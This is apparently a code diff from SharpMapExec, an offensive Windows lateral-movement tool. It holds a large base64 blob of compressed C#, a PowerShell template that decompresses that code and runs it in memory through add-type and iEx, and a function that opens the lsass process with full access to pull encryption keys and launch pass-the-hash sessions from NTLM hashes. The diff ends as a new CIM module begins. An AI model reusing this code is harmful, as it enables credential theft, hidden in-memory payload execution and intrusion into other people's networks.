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";
	99	+	//string csFile = Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\DelegWalk.cs"));
	100	+	string csFile = "H4sIAAAAAAAEAO0923bbOJLvfU7/A+PTZ0aeVhjbyelNp6d7RpFoRxPJUoty3Bnb60OJkMUxRWp48WXa+bJ92E/aX9gqACRBECAlx+mZveghloBCoapQKBQKBeS//uM/09gLroyhN4/COFwk5qkXvDwwbWdB3jmB65P4h6+/YjD2fZyQlfTT7Ia+T+aJFwaxeUQCEnlzGaTnOVdBGCfeXEZm9kdyycAL/i6XTdIg8VbE7AcJicK1TaIbb16hzLTJPI285N4cR14w99aOL0NMyV2iKjMn5Cr1nci6W0ckjpGZCtgyIo4LBVDx9VeBsyLx2pkTowuwoU866/X+11/9+vVXBnzW6cz35sbcd+LYGEfhVeSsWA0HwM9Zz/f7q3UYJa2daxIFxAe5u76/s3shAEUkSaPgjTF0onjp+J24dRKsnMC5Iu70fk3Mt2Hoiw1413HigLgNYA0wGzMAMrpAf0KAGpBc3IqTCJnz10A4NHBwAI+BqbaR13TDFfTkwoBAaUQWhm11Tyb96cfLznQ66b89mVo2gHGMnQTazdKExHXATIoiLKVt1g+WoDkJV7m2kXpBYri3lGag7NB3rqAUxn+cRIDGCm68KAxWJEhEgtMogpKeF4FChtF92zjrBxeMmmlnMj0Z948PR9YvAGonTpSk636wCNtGmCbGeDLqWrZ9iRCTYWfaHx0XvCFYtKKU7NLhbxzDtmGTZODEiRVFYWT8aCRRShrH6QQYfHlgnDpechhGNnDlk9Hsb8BNi7O+pAJqZ5Arz/e9mMzDwI2firInVLmTtctVThr3Vj6SedHAi5N83MvjncMIGvDB8dPi93xme/8Qq8cRufHCNC6D+esJ5Q2B/wXF1Q+8xHN8IE4hMpSPVmxManlhN0yDvJTLEmdB3vxfVAA94hOlvtQw/89jI/JuQLuVfKTMpvIlNJ+8dphG88wEv+NTuVwpl06d6IokUpPSWDKIrIpPoB6JwQq6nTk2AztYz5TKCOeoRmu6uH9Rw8cWKD+MZYkx6/dF++ZdjdYkyBZHyvmar2tchEoRCXB9V0+l4944a++foYkCV9PwmgSZYCWF4suJpDW4LnJ42phBPxWbNVQfkYR2KKy7rSohbWM6em8di0v2ZXfQsW1DbtxFRywDB1dg2ren/W4Vjuu8XDwgwVWyZPKgAGwVYcUb6uaGnHMnzVuTliD99XIC1hBLS4OyXp6CLhJWXuOgQb3ocVEWnnQNrGHIzkyTYiz57G4b7zrHvYF1eTjoHNlgcYZOfF0ppMvYb0DwmJBrdISpuGW3i/+cpYsFifKfwVv6u+SCzO5B1jhqbGSozGlZ58bx/BzsLRYNyCKZLr14CLMOJvnGTHaXTgSMAn/8m9lJk/BxVhDpg2nHdzOjNFmnSXfc+qKWl8+lOF0Rtt7n4mY/mztXd6yUTBB7my4Fg9CBXc8scqL7lnblHIztJIKlM999HHo+QcXZiGo1gW3DunPmib0m4NYD0oydz1jWjpjz0HFd3NjmAh6GbuoXmz1cwzajvWrMtOs5M05soRmSFWzI8u55qeCYv3Viwols04lydoGlfKLlFqtk//z1cbqakWi0oNMI+0vIpju0L81Drhdfhodm+nkHbEWZAO2JPMuqHFS359wJhP3y/FraY9E9dM5vsfVyItCkBFlW7+JL3LMe65ynZkOjnjaigBQj+8GLktTxDyNCrLsakcgMgiyoGLKdKrRHe/Bb0s8p4Rx0fD+cb8ZCNpgFAwvWnA4PspEXA5ZkG89bvRZtYaWYReLufz55WOmXMU1osHOp4Y/c8GTrO3eLg9IUnYa0NdNjDqGexTz+lI/D6IZEvrNeE67tJYZgNUnnoBr3gLbF/rz3Ate0yd9TEmBcQCXkk8Cbh656NUB85cBXASTEIYU2ArAhRMh+UAKrt+MC7KffmL8m7thQzWdqdnKVA4eERDfEbQCDvdJ1Eq4boKZe4hOt/IAc9/aX+uqPDa1xMjdgaAb5hUaMUOhxA65NAWE++bliNIDisqAF2f/OuLWX4e0pKEt4Wwc2n2VDd9CgsZvBLe3E7QfgBzdCMXe5EYza/M+YIPpZoIhebzAbxOWinni2Sqth2JqSRcprgbLF/ovIQLH5bZIBdcnYNr5BY7KjJZj188hbJ3Qcy00aYmxK/Iqg0heRzeCk32sSBl34B+Et+G8aVaYQ77yrpQTydHTKEZommpEvHq7RKB6FAFdkiV0zP0cHimv5d6/AF1t7EXOIvJXGdDE6px/HFusdx1kNmWtlfzi2JvbomMWpBtYHa2CAB0OiOAx4lOmG+HrKMDx3Hzgrb47W90q3PpVBabDBmemWIA58FIXpmhr2WrBx5N2Al3RFakCpuMFp8xYeqZvo1OZX1YAE6UoQrnb4qdCBnhVs0cFb2G8rqkvCfQwdtUP3Bo2Hlr7MXHSCMLhfhWkMRO611TB9F1VzwZVTwU0OKDIEcAcaODxFucqAXgqcl0xWFgITRF4JpNbL/wQWUZ3wqUrFqppci5S1o9sAHG/9YFO8qvoeWTipn/Scua+qZocrqhq662lSHzo3lXhxb0EzG1S14GeABzRPiGt7rhLCZtkGfVcvxE7g1suM45gQ2LOQQM2lDWvL2/CuD9JNVPWd1PWScQi6f68clsi78gJVjeWTm2L3qAAYeME1LIT4tba9qvKdE2cixCMoJeFz6YBeBcR3yt4/KATueG+JUuJlQCtA06kExEyUK5xsWs046fNjFEXdEEbDwQwFvcQH4VUYgNZIdUPnLj+doKcaGxs2cbqXQutv6LqunerHYUAU1qt//M4C46iY/+CLTq3u9PJwMhqCGRnZFtqqxxjgsXgCRwGbiIWhRVrv9vb2D/cODw9lyZJo5QUoBgZEPzL9LGDGXFURTja3XFdYVHAExiIzuXmL13UtJmX0+7KAS8A04iBAH8jQ0omzAPpKBi3lAZXIra5Qyc9pmDgF0P6eAkaYfAXkQQXy55RE90rYV2rYgbcCrl1VE6CjQsh9MF9GYQB73UwFKHKN4mUpWmBW8igO+J3Hvc6kdznpH72b2pcT6+eT/sTqZd0eIr4ftsXRydsfbNCercSw9vaPji/Hk/6wM/mYtd/fqG3vZDzodztTK+92o2aFk5M3fLVRw59PrILE15s3ubRHJ5OulQ/WZoLp/eXEnqJgPvQH1pFl8+YHWzU/moxOxlnTV1s17VmHnZPBlLd9vVVbG7bo4Fv1uULsb6gMXIVaStV6EEVajpHW0DMYXHa6GDFQ4+Vq/6DWxgfJqEpa96BQqBKV5V+ZGiixVof7QTmSD+pBqsOZD4ZSaDxmzNOy8JS6NxhUQ+w2i/OBiwLVNEqtXZrEc+GwEizKMt0wGA8mH4eFFe1KUX45vG/+lURh26ApK7utghCThTWMb4393TZoG7WY8PfV3q7UteKIq+gkI6gt8Ch+F7phAfGMP7kXziCTJT35kE4m5SMAKazfNnaEY9nOjgb/Ml+3FedeGtnttXOyRIb36hnyFkYr7+1HI0h9f7cMISkAflhmj7Fw/Fjekn8q/3zxwsDww3MkwYuN/T2Dp3maplmGzE/RfQycq3JHOZltg62IFQ2AvrpLMr82bpckWcKmLmFsYc61i0Ko9InMZ10WHsTrvYHx8GBUKvb3DioVh/zTLDNR0M+UgtY0xI+YUyZkFchgnz5nqBha0/YJWbf2FfItHzWqJldZH+9eK5A0i0Ehgg3Yl5jhbOMBpC54ozCR1IZMw1LKDI2e86Myfh4yZxnleiNJdRkUjk46iVB+NjefgZZbwTzEXHyzY3f7fRNsBz13a/EOwBztnAfnUcVKoBCfFYd/JRrns8yMzmemmPKV0VMapt0NhM9yaUyKH7PoWzuw4Xl2UZw+gnbBvzDRQoPckXmakGdvjF/3Pu20s9w/ZA2Pi+mtDHp+0NpVKfDm2rr1APOxw/3KYRSuSmMsnzXzwxCW95QNEmzm2Bf9uON1ExQI373E+e0TGOuA3Er1rVI3lGdZJjdOZKC20wgVxZDAz9WEFrWwANGxwlbRXZsWsw2nydC/2vv+u6yTds5Kmx3RS71yUUWZMd7ZkXUYJwu587BSNVZJdN+oVm64sfVDdVcuCPm4gbnapQZZYVJrEOOHsyEpkvj5JB+RZJ/50onYMbvBLJkGQZ40N2GnT2qoIrduGma7ai0wHYE1IdcTes5czvYr6VXJJut/YHaf0HnZSGjJwJHJqWBCNH73uzIXjxoVRMxGhmeR6EFrsFBJwdy41gwMfhRrZvYhoNmP7he8nMQLtEpV07VW31Aoomh/orO6RjRlbUJgvUIxJQaLQrVaaHmh4SDXaGjHbBQ1NS3ARL1O+GsWucW1/HBuHqEn3EZ9y0hnhgsp0HWplO0n8BhxGWupjCHrhbJH3ZBWg+ex8ALH95vtH13DC5Nt9mOK3t3cKRQaqylTUKdeRZkUt3CUypfw6PUBB++s5cfnm/tKbF+PKPD0/3L6DuMBxeH35bgzsY5x7zziG31lDGoTTMP+tH/EjoXGI9jlfxSR/ZsSmR8CC1lWQhfw0dYVRJdvB6Pu+8tjWtedjOzR4fTybf+4M+lb9mVncNr5aF+Ojml/fPOyV8sATQc6vDyB3f20x8LcOet7UsRF2/Ld6PS0f9wbnZbCxMqW8TKMoO3p5bt+L4+bqTthoJlMPgwvR2Nrwi4aKoJnNe1OJ/08Rneg7osuidYvU+u4Z/UuhRwpUAfLBrXIu9SSS1HQkbNgfC5FgbxWDgK6XIRnNdZ4r/rO8hASOzUoxwdrxkBqbHeGVhHdKsL3CnJjh184zZzEagpJheC8jckzRwR2MdFqtGjlIPq25ZwPtRtVQKvyT6CN4GlUlqeqQ64JmDAAuiXRQ/SDegx8E1WNK+TnEvwKhTGnBtA1/pbSeWfMHdlVyNBCU4G2Crv6JozY2gZAGcNtrMHvK9dJV3BKPqFQwHeN6P7lA9U2vqcfedyVl2BKiMUTOZOfrYEzoIjUUAY3I5sJoqA63+p+HtE5mhqiq3ONZpLyeaZIV6vMMzo/Pesum5piHmur2gVI5i1sHNOI4G46Brc6WRIMFqwIJuYa4YIWiBmuLOcoawFTN1y0St3sSlEvJMcU8mJNGouQJz8AaYKT/NYyrvUbqbPiumjDrAcp0C5i49bzfWNGjPCGRLcsHRk9J8nbQN+xgcc8CxK61poCZassxb3GxCjbsWzKasPtt8p0l1XleHNPEZWQ3ZauHTARPE7n/GB10+vcfCN5QJ1/nJrF/WxVJ8hU1snDQ05eib7H7Ae0AaTso91e0VGU8sCFiUHDnO+O/HDm+K163rYRnqrX7aT4jHf320oL5mjHdYsXV56HgX9v9AYDvIWVsKdU1C1zMzIE2bAML5ZAohM214g6OWTt6CSjCZCtKv7207nyzSOvfzRCPx5KXdCDy7kD4ic7d9twK1SDSSHH5m6FIauBFg3HRlBfZhpoI9yHeVwbV2J+Q95Y5eIw1lQejwx240c7vfgkYWY/XzTF2/38rLSaXWSWU2MeFAlIppRos8tDw215ZdXRjed6Sy+GpQKWadzbpb5rYKYh2kx85sinfoqTabLhYwU0cDERLrwHqbJniRCq9r0MY5EGNcak7Iw8lfkA+JaAuV0aB3049H/I7C+HVGqnfiGC/2Vz/nOWvsyx5Q81YfydzRec+bwwm6W7ZuU+hArVMcELCwxZdZI3T+A2v4GpmL410pMfeMk4aku7w4I85pNIm1rqq7D+NcGPB3VgQz593GDctg/NiJ/PGfUNJJbtVDXyyqr/L0jrxYvH912/DSvr3jYoih3Z43Hke0hxSNVx92phBSO/NQj4lHHbB2UgWNFbBbFw1xCRs8Cu0hjQoMY2kcOsUbJto3VNrHFdCTLiJ6lpkShb0ElaPp1QDy4e12rWn53um/NzNgL2+Tl7N/HlARRRccbj8JZE9pL4/vn5zb65d36+xpIYS0xyR4znmARhzO7X+Gzi8yCk55jPb42l57okwJL1jqZrNBaV+yZiZaKrpAZFXVUbQH+oBMc1WJrX7RqR0kgd6KimGiN7VG9VJk6XEqVz2nHcqRf2ZFkpjINaW6g4yi0lLeWmQr0iv3hRZSezELW+eNEQkdN26h4qcaYa0RaZotzu5XkWO84OJiWt6L8x/dczXfoXsxvrnZyZ8KZAgzvUGFvMPhmk6DMpz6YeKkdPxZZnE0EL1Dmuq0j8FF/baRATyLHDAGKP/gXq6V+8A8XasPIw0MqUp5GtnWS+5HaYFr3UHddTyLO9C3qY9Eo+oytD7TOol/JBVRnqgEF15RO0nEQ8KS62RLoE3TYVaJsh5X9KiWsz6UUZVV9fKADwlhlxZkmo9TgPHr3RV/YsGgmUxoZpnXM67i3rbk7ou4aGKkNmW8up4ZaY05BliKvZU7o64P8xo5tlAMRVGDHdsnQis+MtWlckeb6imdSwIuIW2gdKjeeO7+/+GoH63BBV9WEYzckn5azR9/bN7LtXoKC/n1jjQadrDa3fb4sgzDxLcPyfs+y04mlok2k7y9LbFjNrVcYMKLvhKnvi2Tz6q7fmKYBnUm8XZzDYNyRKLt68waxHfNrpu1d8MJHt3faZhE34PgxdAg17ZM7Ldh9HPeBc30/DFhfT1lhch17eOhNfus6yMoG+NFm8xqmYscV6AaXtRJFzDzq7ZX8euTNonzvZ+zZV5b7GcykeENxk6ae4dWs/TYaOExcIr1ZX0k/FvGHgOvveUj17p2KcJ+bkKlvKiJUX/NLpbp4A24T1gKK9InfmEO1Ui5W2jT/vtP70xx/HtkE9bOZOn5/H3MP+yUDJn1PR756ZD+fBw/npw/ntxR92dk0aiFL0WzVmnAS1sGn6ecETpqDXnzfpbKg0whzfdkn5imSJRyaTvXhhYFq+IuaqFoHyqOuxsqh/7ljVVVMYFnnJorebtleIWYVOCGnqpiMb3Dzcj4n4/CYJS/5QTHh6QluaOk+iWWWUG3It0FLcs3gqUja+eyL8rEkm7LEr8eAz/9Er3sD/id6b5lyTuKVPHtS1d6Gce8UakEqEYhECZ+hTZQOI44+pPUJsVyCp+d7Edjuu0kUEaUMjXBbOwrxQYzaFdwtsn3mo3pDK3Bgnp1f9N9rOUTe+8thzsRzJ9z55UhAFe0R4tJkxVTFf6tKYRJhzr7ogkX34GsfeRknujVuPa6VU0eIs6CKRRY/Q/tYzsV8NrEAWfgXfK0gcL4hbf94539k1/sRK7XTGk6Xpz37gkrvRgsPgZUt8ogBqajJEsLp/FcC0oUs9iuHfW/ZHe2oNHwajbmdg2NbkQ79rPRxb09PR5H3++2R42Ht+tvf8+4tvH3qnw+xr53h0/HE4OrGNwehodPyAW2Dhf8gAX2K+hAWeMoc3o86/2f1GJ3h2sw89kH7MfJBMLm2Z8DZzVfj78Car6YKj/JspVGUTqDH2+Kk8/p2U32/h+iWDaWPtNOvUV70dpoCQk0+zj+qhc6bR2sfNTfndGZmR/OaqX3uH4Mt07QvhB866joDy3cRsFuu1UurLzF/vwWW6eDPKrL7e87hbNM9wLcytwHty38oWj8ffqaEoO66boWrnVqfuOEl/3WWDoqcNeGwQ0qj5yd13lILQtvnuIX3R6tTxryWPpowdt7eUUnr1z+cJvj/mXIwqt+6rLawoElrIDzZKbeLiJEy4ZggEs6KK6Sg3BeSbN80oskkCXbbEnmtAWWhN7Ks6xXSeIGooGkXJo5Q6w/XsKgOlf036atXb+xbw9ZMRsf2n1mfE9h46iwxJs3NY9SE8E+am6kQLL9d4LoU49CLYUXGKABxNxt6upqE6zPeHC+OEd5qdhtTNXS2Ssee+4dxRJECisn3pKA6A2uAsbdaR4p6VWkNAhcxDP42XWnWjCtQAw1WymHKNClnMtao6ykGWiofIa779sTT9BLNUB5/PAz08t1Gh/KRrjZW6CUHNhrBK8Herzy4MJ7qK9bsvXF4QIns9Q3HVU6H6CpU6e35hDL2YJoQBwhTdPaWWMK7qYybli2cgeyTxbE8+F/l/87G1+XgC4/F5piO7TKhXAP4V/nz6byhxEsUVcgAA";
100	101		string function = @"
101	102		$b64 = '{0}'
102	103		$output = New-Object System.IO.MemoryStream
103	104		$Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
104	105		$Stream.CopyTo($output)
105	106		$data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
	107	+
	108	+	$data = $data.Replace('REPLACEME', '{1}')
106	109		add-type -Language CSharp $data
107		-
108		-	[ConsoleApp1.Program]::DelegWalk('{1}')
	110	+	[ConsoleApp1.Program]::DelegWalk()
109	111		";
110		-	return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
	112	+	return String.Format(function, csFile, CompressData(command));
111	113		}
112	114
113	115		public static string FindSystemCred()
		skipped 119 lines
233	235		{{
234	236		a.EntryPoint.Invoke(null, new object[]
235	237		{{
236		-	args.Skip(1).ToArray<string>()
	238	+	args.ToArray<string>()
237	239		}});
238	240		}}
239	241		catch
		skipped 21 lines
261	263		}}
262	264		'@
263	265		Add-Type -Language CSharp -TypeDefinition $code
264		-	[array]$arg = @'
265		-	null {1}
266		-	'@.split()
	266	+	[array]$arg = '{1}'.split()
267	267		", file, arguments);
268	268		return String.Format(@"
269	269		{0}
270	270		iEx $data
271	271		$([Loader.Program]::LoadAssembly($arg) \| out-string)
272		-	", DecompressData(Misc.CompressData(template)));
	272	+	", DecompressData(CompressData(template)));
273	273		}
274	274		}
275	275		}

■ ■ ■ ■ ■ ■

SharpMapExec/Helpers/SecurityContext.cs

		skipped 137 lines
138	138		hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);
139	139		Keys keys = new Keys(hProcess, lsasrv, osHelper);
140	140		Pth.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, true);
	141	+	//Ptp.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, false);
141	142		}
142	143
143	144		public static string AskTicket(string user, string domain, string hash, KERB_ETYPE encType, string dc)
		skipped 41 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Cim.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.Linq;
4	+	using System.Management;
5	+	using System.Text;
